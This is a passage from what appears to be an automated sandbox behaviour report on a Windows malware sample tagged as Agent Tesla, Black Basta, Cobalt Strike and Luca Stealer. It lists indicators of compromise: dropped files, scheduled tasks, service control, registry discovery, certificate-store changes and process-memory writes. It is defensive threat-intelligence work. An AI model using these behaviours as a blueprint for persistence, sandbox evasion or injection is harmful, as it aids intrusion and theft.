Defender\ja-JP\MpEvMsg.dll.mui cmd.exe -
Drops file in Windows directory 16 IoCs
description ioc Process File opened for modification C:\Windows\ZuMiller c8993dd17a.exe File opened for modification C:\Windows\LimeNirvana c8993dd17a.exe File opened for modification C:\Windows\ExceedExec c8993dd17a.exe File created C:\Windows\Tasks\tgvazx.job Amadey.exe File created C:\Windows\Tasks\futors.job amnew.exe File opened for modification C:\Windows\CongressJvc c8993dd17a.exe File opened for modification C:\Windows\DealersFocuses c8993dd17a.exe File opened for modification C:\Windows\PolarRail c8993dd17a.exe File opened for modification C:\Windows\NewcastlePeripherals c8993dd17a.exe File opened for modification C:\Windows\LocksWisconsin c8993dd17a.exe File opened for modification C:\Windows\AndorraPrint c8993dd17a.exe File created C:\Windows\Tasks\rapes.job TempJR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE File opened for modification C:\Windows\SyntheticLil c8993dd17a.exe File opened for modification C:\Windows\DependMedication c8993dd17a.exe File opened for modification C:\Windows\MadnessSet c8993dd17a.exe File opened for modification C:\Windows\AucklandChef c8993dd17a.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3800 sc.exe 3552 sc.exe 4080 sc.exe 5260 sc.exe 5056 sc.exe 5824 sc.exe 4600 sc.exe 1232 sc.exe 1864 sc.exe 2348 sc.exe 1132 sc.exe 3464 sc.exe 3344 sc.exe 1200 sc.exe 4076 sc.exe 1296 sc.exe 2832 sc.exe 2144 sc.exe 3784 sc.exe 5736 sc.exe 868 sc.exe 3076 sc.exe 1000 sc.exe 4040 sc.exe 2828 sc.exe 4660 sc.exe 5948 sc.exe 4996 sc.exe 812 sc.exe 452 sc.exe 5024 sc.exe 64 sc.exe 1128 sc.exe 1604 sc.exe 5144 sc.exe 5792 sc.exe 5636 sc.exe 1584 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 18104 2612 WerFault.exe 368 19032 18140 WerFault.exe 380 25404 6944 WerFault.exe 369 27796 25368 WerFault.exe 396 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3f2e1d5910.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tgvazx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language but2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a8afec1b66.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 272.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 272.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3c45e50620.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Constraints.com Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 92286f2337.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UU0LfLZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 92286f2337.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 26e3163963.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language abd9625a86.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language br30yxxIPR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pcidrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eb5f738682.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 92286f2337.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Amadey.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempJIFHCAB1AIJXDLPQM3ZZBW3ZHL2EZYCO.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c8993dd17a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempJR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c48d7ad7ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe -
Checks processor information in registry 2 TTPs 26 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Delays execution with timeout.exe 3 IoCs
pid Process 4948 timeout.exe 6660 timeout.exe 18268 timeout.exe -
Enumerates system info in registry 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Kills process with taskkill 5 IoCs
pid Process 6660 taskkill.exe 5144 taskkill.exe 6296 taskkill.exe 4040 taskkill.exe 6648 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000_Classes\Local Settings rapes.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4232 schtasks.exe 684 schtasks.exe 5256 schtasks.exe 6252 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1484 powershell.exe 1484 powershell.exe 5500 TempJR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE 5500 TempJR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE 5176 rapes.exe 5176 rapes.exe 1768 powershell.exe 1768 powershell.exe 1768 powershell.exe 6108 powershell.exe 6108 powershell.exe 6108 powershell.exe 4464 MSBuild.exe 4464 MSBuild.exe 4464 MSBuild.exe 4464 MSBuild.exe 4492 MSBuild.exe 4492 MSBuild.exe 5636 powershell.exe 5636 powershell.exe 5636 powershell.exe 2416 powershell.exe 2416 powershell.exe 2416 powershell.exe 4492 MSBuild.exe 4492 MSBuild.exe 1732 chrome.exe 1732 chrome.exe 740 MSBuild.exe 740 MSBuild.exe 740 MSBuild.exe 740 MSBuild.exe 1484 rapes.exe 1484 rapes.exe 2832 powershell.exe 2832 powershell.exe 2832 powershell.exe 4988 TempJIFHCAB1AIJXDLPQM3ZZBW3ZHL2EZYCO.EXE 4988 TempJIFHCAB1AIJXDLPQM3ZZBW3ZHL2EZYCO.EXE 4492 MSBuild.exe 4492 MSBuild.exe 1436 powershell.exe 1436 powershell.exe 1436 powershell.exe 5448 MSBuild.exe 5448 MSBuild.exe 5448 MSBuild.exe 5448 MSBuild.exe 4232 9b14f9cb38.exe 4232 9b14f9cb38.exe 2272 powershell.exe 2272 powershell.exe 2272 powershell.exe 4232 9b14f9cb38.exe 4232 9b14f9cb38.exe 4232 9b14f9cb38.exe 4232 9b14f9cb38.exe 4492 MSBuild.exe 4492 MSBuild.exe 2304 powershell.exe 2304 powershell.exe 2304 powershell.exe 3080 MSBuild.exe 3080 MSBuild.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 660 Process not Found 660 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1332 msedge.exe 1332 msedge.exe 1924 msedge.exe 1924 msedge.exe -
Suspicious use of AdjustPrivilegeToken 41 IoCs
description pid Process Token: SeDebugPrivilege 1484 powershell.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeDebugPrivilege 2508 7q8Wm5h.exe Token: SeDebugPrivilege 6108 powershell.exe Token: SeDebugPrivilege 5636 powershell.exe Token: SeDebugPrivilege 2416 powershell.exe Token: SeShutdownPrivilege 1732 chrome.exe Token: SeCreatePagefilePrivilege 1732 chrome.exe Token: SeShutdownPrivilege 1732 chrome.exe Token: SeCreatePagefilePrivilege 1732 chrome.exe Token: SeShutdownPrivilege 1732 chrome.exe Token: SeCreatePagefilePrivilege 1732 chrome.exe Token: SeDebugPrivilege 2832 powershell.exe Token: SeShutdownPrivilege 1732 chrome.exe Token: SeCreatePagefilePrivilege 1732 chrome.exe Token: SeShutdownPrivilege 1732 chrome.exe Token: SeCreatePagefilePrivilege 1732 chrome.exe Token: SeShutdownPrivilege 1732 chrome.exe Token: SeCreatePagefilePrivilege 1732 chrome.exe Token: SeShutdownPrivilege 1732 chrome.exe Token: SeCreatePagefilePrivilege 1732 chrome.exe Token: SeDebugPrivilege 1436 powershell.exe Token: SeDebugPrivilege 2272 powershell.exe Token: SeDebugPrivilege 2304 powershell.exe Token: SeDebugPrivilege 7008 powershell.exe Token: SeDebugPrivilege 3552 tasklist.exe Token: SeDebugPrivilege 4292 tasklist.exe Token: SeDebugPrivilege 5316 IsValueCreated.exe Token: SeDebugPrivilege 6524 powershell.exe Token: SeDebugPrivilege 2036 powershell.exe Token: SeDebugPrivilege 6396 powershell.exe Token: SeDebugPrivilege 1804 powershell.exe Token: SeDebugPrivilege 5144 taskkill.exe Token: SeDebugPrivilege 6296 taskkill.exe Token: SeDebugPrivilege 4040 taskkill.exe Token: SeDebugPrivilege 6648 taskkill.exe Token: SeDebugPrivilege 6660 taskkill.exe Token: SeDebugPrivilege 1096 firefox.exe Token: SeDebugPrivilege 1096 firefox.exe Token: SeDebugPrivilege 2480 26e3163963.exe Token: SeDebugPrivilege 5736 93Q6JeiQLY.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3664 2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3664 2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3664 2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 1732 chrome.exe 4920 c48d7ad7ca.exe 4920 c48d7ad7ca.exe 4920 c48d7ad7ca.exe 1332 msedge.exe 3220 Constraints.com 3220 Constraints.com 3220 Constraints.com 1864 92286f2337.exe 1864 92286f2337.exe 1864 92286f2337.exe 1864 92286f2337.exe 1864 92286f2337.exe 1864 92286f2337.exe 1864 92286f2337.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1864 92286f2337.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1864 92286f2337.exe 1864 92286f2337.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 3664 2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3664 2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 3664 2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 4920 c48d7ad7ca.exe 4920 c48d7ad7ca.exe 4920 c48d7ad7ca.exe 3220 Constraints.com 3220 Constraints.com 3220 Constraints.com 1864 92286f2337.exe 1864 92286f2337.exe 1864 92286f2337.exe 1864 92286f2337.exe 1864 92286f2337.exe 1864 92286f2337.exe 1864 92286f2337.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1864 92286f2337.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1096 firefox.exe 1864 92286f2337.exe 1864 92286f2337.exe 1864 92286f2337.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1096 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3664 wrote to memory of 2696 3664 2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3664 wrote to memory of 2696 3664 2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3664 wrote to memory of 2696 3664 2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 3664 wrote to memory of 532 3664 2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 3664 wrote to memory of 532 3664 2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 3664 wrote to memory of 532 3664 2025-04-04_b19ff2ebc03f382529b2f8802b4bf39c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 88 PID 2696 wrote to memory of 4232 2696 cmd.exe 90 PID 2696 wrote to memory of 4232 2696 cmd.exe 90 PID 2696 wrote to memory of 4232 2696 cmd.exe 90 PID 532 wrote to memory of 1484 532 mshta.exe 92 PID 532 wrote to memory of 1484 532 mshta.exe 92 PID 532 wrote to memory of 1484 532 mshta.exe 92 PID 1484 wrote to memory of 5500 1484 powershell.exe 98 PID 1484 wrote to memory of 5500 1484 powershell.exe 98 PID 1484 wrote to memory of 5500 1484 powershell.exe 98 PID 5500 wrote to memory of 5176 5500 TempJR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE 101 PID 5500 wrote to memory of 5176 5500 TempJR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE 101 PID 5500 wrote to memory of 5176 5500 TempJR6VYZW9SZEC2YDOIAKPGGVFWVXFFQKW.EXE 101 PID 5176 wrote to memory of 2508 5176 rapes.exe 